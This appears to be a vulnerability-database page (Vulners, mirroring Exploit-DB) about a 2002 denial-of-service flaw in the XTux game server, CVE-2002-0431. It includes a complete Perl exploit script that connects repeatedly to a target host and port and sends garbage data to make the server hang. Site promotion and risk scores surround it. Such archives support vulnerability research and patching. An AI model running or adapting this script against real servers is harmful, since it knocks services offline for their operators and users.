Lucene search
+L

XTux Server 2001.0 6.01 - Garbage Denial of Service

🗓️ 09 Mar 2002 00:00:00Reported by b0ilerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

XTux Server 2001.0 is vulnerable to garbage denial of service by sending unexpected characters.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-0431
2 Apr 200305:00
cve
cvelist
Cvelist
CVE-2002-0431
2 Apr 200305:00
cvelist
euvd
EUVD
EUVD-2002-0428
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-0431
26 Jul 200204:00
nvd
source: https://www.securityfocus.com/bid/4260/info

XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources.

#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponcive and takes up lots of CPU.

use IO::Socket;

for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
        print "Connecting to $ARGV[0] port $ARGV[1]\n";
        $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],  PeerPort =>
$ARGV[1], Proto    => 'tcp' ) or print "\ncouldn't connect\n\n";
        sleep 3;
        print $sock "garbage data\n\n";
}
exit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03213
25